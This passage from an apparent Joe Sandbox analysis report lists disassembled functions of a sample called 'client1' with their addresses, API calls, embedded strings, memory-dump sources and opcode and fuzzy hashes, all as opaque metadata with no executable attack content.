                                                    • Instruction ID: 656b6e8983623b122357d00c99749a305ae9c84d59e6f5c745ca3d34864de241
                                                    • Opcode Fuzzy Hash: 12b4c4cf3228bb0d2d143253dfe1ec6c57aca567516acc9888419e859067e15b
                                                    • Instruction Fuzzy Hash: C14173B2E0AB16D5EB569F75D8000BF27A8AB45B94B044072DE0E62A94DF3DE947C360
                                                    Function 00007FFBAA70F010 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$ContextErr_FormatFreeMem_Object_SubtypeType_Var_
                                                    • String ID:
                                                    • API String ID: 3064042339-0
                                                    • Opcode ID: a16e780cdf499231d06022fa089847657aad77cb3ed2b07bbf0e76c6e2031ded
                                                    • Instruction ID: 84b491daa1b4007492cd94a7b4fb90971290591fca6b2879196af266a69bc870
                                                    • Opcode Fuzzy Hash: a16e780cdf499231d06022fa089847657aad77cb3ed2b07bbf0e76c6e2031ded
                                                    • Instruction Fuzzy Hash: 834160B2A0AB02D5EB668F75D8500BE27A8AB44B94F1440B2DE0E52B95DE3DE543C320
                                                    Function 00007FFBAB4928A0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t$Number_
                                                    • String ID:
                                                    • API String ID: 4245833954-0
                                                    • Opcode ID: 324df5c6c456926af738d9154dbada473049b4658e8eab271715651b46320d21
                                                    • Instruction ID: 07973e157972e56a9f820d493ac69be708be3482b2ca66322b770602fad09cd5
                                                    • Opcode Fuzzy Hash: 324df5c6c456926af738d9154dbada473049b4658e8eab271715651b46320d21
                                                    • Instruction Fuzzy Hash: 892141B1B0BA5641EE168B36D5A417C6360AF55BF4F089234DE7E077E5DE2CE4468301
                                                    Function 00007FFBAA7024A0 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$ContextErr_FormatObject_SubtypeType_Var_
                                                    • String ID:
                                                    • API String ID: 2679858911-0
                                                    • Opcode ID: c7fd0e211f10f72f34beba943990120b88892db11ff7f0b1b49b95f2add7cb6d
                                                    • Instruction ID: bbe51d7b0a5759b77e2b5fd79ca937ae4791b5de29a6a20e6a4e8337ba281855
                                                    • Opcode Fuzzy Hash: c7fd0e211f10f72f34beba943990120b88892db11ff7f0b1b49b95f2add7cb6d
                                                    • Instruction Fuzzy Hash: A84186B2E0AA12D4E7568F35D4240BE27A8EB44B94F0400B2DF0E56794DE3CE943C3A0
                                                    Function 00007FFBAB492AD0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t$MultiplyNumber_
                                                    • String ID:
                                                    • API String ID: 3214704217-0
                                                    • Opcode ID: 077d120661e2442c2d7c8d046fe9cbc6f5cfd7a77582022ebf4a7fc655b50c7f
                                                    • Instruction ID: 50b03805f7f1fbeec8b55b712d6f2173d76378aa463ade22dfbbd27613d2ebdf
                                                    • Opcode Fuzzy Hash: 077d120661e2442c2d7c8d046fe9cbc6f5cfd7a77582022ebf4a7fc655b50c7f
                                                    • Instruction Fuzzy Hash: EA315261B0BA1281EE564F36E59427C53A0AF55BF4F089639DE3E067E5DE2CE4418301
                                                    Function 00007FFBAB4929C0 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t$Number_Subtract
                                                    • String ID:
                                                    • API String ID: 2424657569-0
                                                    • Opcode ID: f24f7a854c09d2b2b1a08854a685ffdd7303fa68c210250e5475e1596f9aeefc
                                                    • Instruction ID: aa01e571820887fdf78be64b69313930f8840b642f9837480bf5f22d90426bb9
                                                    • Opcode Fuzzy Hash: f24f7a854c09d2b2b1a08854a685ffdd7303fa68c210250e5475e1596f9aeefc
                                                    • Instruction Fuzzy Hash: C6219372B0BA4281EE1A8B36E59417D63A0EF89BE4F089135DF7D077A9DE2CE4458301
                                                    Function 00007FF79F63A798 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A7A7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A7DD
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A80A
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A81B
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A82C
                                                    • SetLastError.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A847
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: de2209737f62c3ef05340c1457763ccac6bfd4de9bf3f87891e85fc6fda23dbb
                                                    • Instruction ID: 54e04fc50cd6634a31d28a0e04e6114a808eb9d4249d7a0ded5da86cd2ab78ff
                                                    • Opcode Fuzzy Hash: de2209737f62c3ef05340c1457763ccac6bfd4de9bf3f87891e85fc6fda23dbb
                                                    • Instruction Fuzzy Hash: 9E113B28E0D3C242FA747B315A811FAE25B5F55BB0F844734D83E17AD6DEADB402A630
                                                    Function 00007FFBAA6F30C0 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 52stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: strchr
                                                    • String ID: +- $<>=^$z
                                                    • API String ID: 2830005266-2919174415
                                                    • Opcode ID: d3f128c2def1c522b420359bfec4aefe832e3c5070af67f1566c0b2452d1659d
                                                    • Instruction ID: d0921964fb3e0dec5693086098d5dc3ca97bff2266a8badc61aa6a5e5fb4038d
                                                    • Opcode Fuzzy Hash: d3f128c2def1c522b420359bfec4aefe832e3c5070af67f1566c0b2452d1659d
                                                    • Instruction Fuzzy Hash: D2119391B0F952C0FE16CF24D94027D7AA8AB45F44F4860B6CE6D02664CF2CE05BCB20
                                                    Function 00007FFBAA6FFD10 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    • Opcode ID: c5c8307c3cb33d4391b134a0639fa64f4c831d89a86ee65978a0350792aa4ed5
                                                    • Instruction ID: 59940dd843a1bd9e1d6bab528f45c79acf62c529078faf766cc94d95ff34b9cf
                                                    • Opcode Fuzzy Hash: c5c8307c3cb33d4391b134a0639fa64f4c831d89a86ee65978a0350792aa4ed5
                                                    • Instruction Fuzzy Hash: D8A1E2E2B1E342C1FE224F38D40537E2695EB59B90F105972CD5F06BD9DE6CE08B4A21
                                                    Function 00007FFBAA70CB6C Relevance: 8.9, APIs: 7, Instructions: 193COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,00000000,00000000,00000000,?,?,00000000,00007FFBAA70CA90,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA70CC02
                                                    • memmove.VCRUNTIME140(?,?,00000000,00000000,00000000,?,?,00000000,00007FFBAA70CA90,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA70CC2D
                                                    • memset.VCRUNTIME140(?,?,00000000,00000000,00000000,?,?,00000000,00007FFBAA70CA90,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA70CCB6
                                                    • memset.VCRUNTIME140(?,?,00000000,00000000,00000000,?,?,00000000,00007FFBAA70CA90,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA70CD3F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: memmovememset
                                                    • String ID:
                                                    • API String ID: 1288253900-0
                                                    • Opcode ID: 8a6dc82ef5a93ce2ecb99fe39f02b221e9f70e8a691fc071edbf52bf3e6204c6
                                                    • Instruction ID: bf409db27195eba7315b78960a82bb7326a0ba518b202e3189625a515b2e899b
                                                    • Opcode Fuzzy Hash: 8a6dc82ef5a93ce2ecb99fe39f02b221e9f70e8a691fc071edbf52bf3e6204c6
                                                    • Instruction Fuzzy Hash: CA71B2A6B55A8091DA11DF66E8002EBB759FB85FE4F444232DEAC1B7D6CE3CD106C314
                                                    Function 00007FFBAA717FEC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 193COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    • Opcode ID: ee32b34d6fc8a14934b56d76bb17223b7b4a547d43165699dc28cafdf4a0c713
                                                    • Instruction ID: a8541f347205c1c9f8d5d3a2033b80886fd8aff9291073e97cbd2c8d7ff8c6d7
                                                    • Opcode Fuzzy Hash: ee32b34d6fc8a14934b56d76bb17223b7b4a547d43165699dc28cafdf4a0c713
                                                    • Instruction Fuzzy Hash: FD918CB2A19B85C9E7118F74E8406ED7BB8FB45798F501266EE8D13B69CF38C146C740
                                                    Function 00007FF79F62C8A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    • Opcode ID: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                    • Instruction ID: 8982f06502d7dfab5b13709e126607f1b10cb27aac9b01bbc65d27bf8337a259
                                                    • Opcode Fuzzy Hash: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                    • Instruction Fuzzy Hash: C251C932B0578286D724EB35E8046E9B77AFB44BA4F908130DE6A87789DF38E941C751
                                                    Function 00007FFBAB4A08C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: SubtypeType_
                                                    • String ID: bool$float$mess_ratio$str
                                                    • API String ID: 2891779845-3758540285
                                                    • Opcode ID: 47fda406b1bb7d020c45dd9310fa2455a273a1e29fc7599b418df2cb59763824
                                                    • Instruction ID: a11a57f9430909525fead5400b2fad9de55c7060321fcdc8f0929c2d22d14d29
                                                    • Opcode Fuzzy Hash: 47fda406b1bb7d020c45dd9310fa2455a273a1e29fc7599b418df2cb59763824
                                                    • Instruction Fuzzy Hash: 6F3142A2B0D64185FA519B36F4811BA67A5FB94BC4F588036EEAC47B79CF2CD4918B00
                                                    Function 00007FF79F622240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                    • String ID: Unhandled exception in script
                                                    • API String ID: 3081866767-2699770090
                                                    • Opcode ID: fcf731bf2ceca6e070dbdbaa780c49a73cf052ed135755c936a54f607c2ce467
                                                    • Instruction ID: 75cbf9dd7fa8ae9d9d2df12f7b1f021d5dba8617397ec20490fe5290584012cd
                                                    • Opcode Fuzzy Hash: fcf731bf2ceca6e070dbdbaa780c49a73cf052ed135755c936a54f607c2ce467
                                                    • Instruction Fuzzy Hash: D3316B32A08BC289EB20FF71E8451E9A36AFF88794F800135EA5D8BA55DF7CD145C711
                                                    Function 00007FF79F622620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F6274B0: GetLastError.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F6274D7
                                                      • Part of subcall function 00007FF79F6274B0: FormatMessageW.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F627506
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • MessageBoxA.USER32 ref: 00007FF79F622748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 2806210788-2410924014
                                                    • Opcode ID: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                    • Instruction ID: 427f49a35eef2caea9a4960fb05762d764c75c52f36becf58bf441f8cbd09b05
                                                    • Opcode Fuzzy Hash: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                    • Instruction Fuzzy Hash: 8631747262C7C291E630BB20E8517DAA36AFB84794FC04036E69D43A99DF3CD305CB50
                                                    Function 00007FFBAA70630C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 3219279049-3732962867
                                                    • Opcode ID: f16d0d432f3dca6f6defb90f8218ed74a796cf603d5bb32d81ff3fe8792b9dfa
                                                    • Instruction ID: 9eaee9ab90eae7f2d7d00d3f3285ae082073b19b394d3aee1f7570787cc3aad9
                                                    • Opcode Fuzzy Hash: f16d0d432f3dca6f6defb90f8218ed74a796cf603d5bb32d81ff3fe8792b9dfa
                                                    • Instruction Fuzzy Hash: DD3161E1A1AB42D1EA029F35E8604BBA7ACFF84B84F400072ED4D56664EF7CE517C760
                                                    Function 00007FFBAA70738C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
